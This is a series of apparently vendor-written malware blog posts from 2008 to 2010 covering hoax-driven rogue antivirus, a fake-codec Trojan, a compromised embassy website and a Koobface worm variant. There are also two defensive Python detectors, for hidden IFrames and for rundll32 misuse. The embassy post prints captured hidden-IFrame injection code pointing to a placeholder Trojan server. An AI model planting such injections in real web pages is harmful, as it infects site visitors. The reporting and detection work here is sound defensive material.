1/28/2010 3:50:00 PM

Hackers use a Facebook hoax to plant Rogue Antimalware

by Oren Medini

Hackers are spreading a rumor about Facebook that describes an app as a botnet, and are using the rumor to infect Facebook users with rogue anti-malware.

In the last 48 hours a rumor was spread claiming that an “unnamed app” in Facebook is actually a bot Trojan. The rumor was a hoax, and hackers used it to distribute malicious fake antivirus software (rogue anti-malware). When Googling for “unnamed app”, people received links to sites which pose as security sites but are actually fake antivirus traps – rogue anti-malware sites.

Please be aware.


Tags: Malweb | Hackers | Web-based Trojans

1/26/2010 6:43:00 PM

Johnny Depp fake death notice - fake ActiveX codec

by Oren Medini

On Jan 25 hackers spread a rumor claiming Johnny Depp died in a car accident. It was like a fire in a field of thorns: Twitter messages were sent talking about the rumor and gossip websites crashed. When trying to find more information about the death of the actor using Google, some of the results led to websites containing a video of the car crash. The problem is that when you try to watch the video you receive a message saying you don't have a supported codec and need to download one in order to watch it. The so-called codec is actually a Trojan.

Here is a screen shot of the fake CNN page uploaded to the Angelfire website, taken from the Sky News website: http://tinyurl.com/yh7dsdz

Watch out for rumors!


Tags: Malweb | Hackers | Web-based Trojans

1/25/2010 4:20:00 PM

Top 10 Chinese cyber attacks

by Oren Medini

Malicious activity coming from Chinese servers has been known about for a long time. In many cases we see Chinese servers being used by bots that are spread over the web. Most of these bots are propagated in order to steal identities and information, install backdoors, etc.

But there is also other activity: unlike these bots, which are operated by hackers, there is also a cyber-war.

We know that countries use hacking techniques to carry out espionage against other countries, that security organizations employ hackers in order to penetrate other countries' servers, and from the Google incident in China we actually learned something that was already clear to everybody – Big Brother is watching you.

The “Foreign Policy” web site (http://www.foreignpolicy.com/) published a very interesting article that reviews the top 10 Chinese cyber attacks (that we know of) against US government sites:

http://thecable.foreignpolicy.com/posts/2010/01/22/the_top_10_chinese_cyber_attacks_that_we_know_of


Tags: Malweb | Hackers | Web-based Trojans | eCrime

2/4/2009 5:48:00 PM

Iraq's embassy in Tehran website compromised by hackers

by Rony Michaely

The official website of the Embassy of Iraq in Tehran was compromised with a malicious script that exploits multiple vulnerabilities. Upon execution of the malicious script, an obfuscated hidden IFrame leads to another obfuscated exploit. Visitors to the embassy website may end up with a Trojan downloader taking over their system.

The malicious script was found inside the main page of the Embassy’s website: iraqembassy.ir. The exploit is currently unrecognized by other anti-virus vendors. All of our competitors fail to block the exploit and the installed Trojan. The obfuscated JavaScript IFrame code is detected by eSafe as JS.Obfuscate.

The following are details of this attack. Note that the links to exploits and Trojans were replaced with [Trojan-server].

 1. The script code executed in the website’s main page (fragment as captured):  iframe name=c10 src='http://[Trojan-server].html' width=536 height=105 style='visibility:hidden'></iframe>')</SCRIPT>

 2. The hidden IFrame element executed by the Web browser refers to another IFrame element located on a server in Latvia: <iframe style="position: absolute; top: 10; left: 124; width: 546px; height: 524px; visibility: hidden" frameborder="0" scrolling="no" src="<Trojan-Server>?sid=1"></iframe>

 3. The second IFrame element directs the browser to an obfuscated page that contains multiple exploits.

 4. The page of obfuscated exploitation scripts attempts to gain control over the affected system by installing a Trojan downloader.
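As an added defender-side example (not code from the post or from eSafe), a small Python check that parses a page and flags IFrames concealed the way the two frames above are: hidden by style, or sized to a pixel or less (a variant the post does not show). The sample HTML is constructed and keeps the post's [Trojan-server] placeholder rather than any real address.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not from the post): an ordinary embed, the two hidden
# frames shown above, and a 1x1 frame, a variant the post does not show.
SAMPLE_HTML = """
<iframe src="https://www.example.com/video" width="640" height="360"></iframe>
<iframe name=c10 src='http://[Trojan-server].html' width=536 height=105
        style='visibility:hidden'></iframe>
<iframe style="position: absolute; top: 10; left: 124; width: 546px;
        height: 524px; visibility: hidden" frameborder="0" scrolling="no"
        src="http://[Trojan-server]?sid=1"></iframe>
<iframe src="http://[Trojan-server]/tiny" width="1" height="1"></iframe>
"""

class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag and attribute names
            self.iframes.append({k: (v or "") for k, v in attrs})

def _dimension(attrs, name):
    """Width/height in pixels from the style or the HTML attribute, else None."""
    style = attrs.get("style", "").lower()
    m = re.search(r"(?<![\w-])" + name + r"\s*:\s*(\d+)", style)
    value = m.group(1) if m else attrs.get(name, "")
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None

def hidden_reasons(attrs):
    """Reasons an iframe looks deliberately concealed (empty list if none)."""
    reasons = []
    style = attrs.get("style", "").lower()
    if re.search(r"visibility\s*:\s*hidden|display\s*:\s*none", style):
        reasons.append("hidden-by-style")
    dims = [_dimension(attrs, n) for n in ("width", "height")]
    if any(d is not None and d <= 1 for d in dims):
        reasons.append("near-zero-size")
    return reasons

def find_hidden_iframes(html):
    """Return (src, reasons) for every iframe that triggers at least one reason."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for frame in parser.iframes:
        reasons = hidden_reasons(frame)
        if reasons:
            hits.append((frame.get("src", ""), reasons))
    return hits
```

A hit is a signal to inspect, not proof of compromise: legitimate pages also use hidden frames, so the src host and the page it came from still need to be reviewed.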


Tags: Web-based Trojans

11/23/2008 10:47:00 PM

Facebook Worm Needs Your Help to Read CAPTCHAs!

by Bahaa Naamneh

After using Geocities as its main redirection point, the Koobface worm is now taking advantage of Google’s Blogger to redirect Facebook users to malware websites.

In this latest attack, the worm sends messages to Facebook users urging them to watch a video which appears to be on Blogger. Victims of this attack will end up infecting their system with the latest Koobface worm from a fake YouTube website. In order to create Blogger accounts at random to be used for the redirections to the malicious domains, this Koobface variant requires a little help from you: reading CAPTCHAs.

This attack uses tempting messages such as “You look so fine in this video”; here is how the messages may look:

If the user complies with this message and clicks the proposed blogspot.com link, he will be redirected to a fake YouTube website. The fake YouTube site requires the user to install an alleged “Adobe Flash Player Installer” (Flash_Update.exe) in order to watch the video. Executing Flash_Update.exe infects the system with the Koobface worm.

The following details explain how this attack works:
Flash_Update.exe downloads a couple of executables, google_reg.exe and captcha.exe, from aibcvienna.org, which appears to be a legitimate website compromised by the hackers, into the affected system. It’s important to note that the domain also hosts other executables tailored for hi5 and MySpace users.

The file google_reg.exe attempts to create new Google accounts, for which it needs the help of humans in reading the CAPTCHA. It uploads the CAPTCHA image to a server and waits for captcha.exe to download it. captcha.exe drops a file named captcha5.dll into the Program Files directory and runs it using rundll32.exe, a system file used for executing .dll files. The dropped DLL displays a shutdown window which freezes the system and demands that the user enter the characters seen in an image before a 3-minute countdown timer ends. The image is in fact the CAPTCHA that google_reg.exe is waiting for the victim to decipher.

Once entered, the characters are sent back to the server, where google_reg.exe is waiting for them to finish creating the blogspot.com account for later use in attacking other Facebook users.
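As an added defender-side example (not code from the post), a Python check over constructed process-creation events that flags rundll32.exe loading a DLL from outside the Windows system directories, which is the pattern captcha.exe uses to run the dropped captcha5.dll from Program Files. The event fields, the paths and the parent-process chain are assumptions modelled on the chain described above.

```python
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed process-creation events (not from the post); the file names
# follow the chain described above, the directories are illustrative.
EVENTS = [
    {"parent": r"C:\Users\bob\Downloads\Flash_Update.exe",
     "image": r"C:\Users\bob\AppData\Local\Temp\captcha.exe",
     "cmdline": "captcha.exe"},
    {"parent": r"C:\Users\bob\AppData\Local\Temp\captcha.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Program Files\captcha5.dll",Start'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# rundll32 takes "<dll>,<entry point>"; capture the DLL path, quoted or not.
DLL_ARG = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?', re.I)

def rundll32_dll(cmdline):
    """The DLL path rundll32 was asked to load, or None if none is given."""
    m = DLL_ARG.search(cmdline)
    return m.group(1).strip() if m else None

def suspicious_rundll32(event):
    """Reasons a rundll32 launch resembles the captcha5.dll step (empty if none)."""
    if not event["image"].lower().endswith("\\rundll32.exe"):
        return []
    dll = rundll32_dll(event["cmdline"])
    if dll is None:
        return ["no-dll-argument"]
    reasons = []
    if not dll.lower().startswith(SYSTEM_DIRS):
        reasons.append("dll-outside-system-dirs")
    if not event["parent"].lower().startswith("c:\\windows\\"):
        reasons.append("non-system-parent")
    return reasons

def scan(events):
    """Return (cmdline, reasons) for each event that triggers at least one reason."""
    hits = []
    for event in events:
        reasons = suspicious_rundll32(event)
        if reasons:
            hits.append((event["cmdline"], reasons))
    return hits
```

Legitimate installers also run DLLs from Program Files through rundll32, so the parent-process reason is what separates this chain (a freshly downloaded executable spawning it) from routine activity.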


Tags: Hackers | Web-based Trojans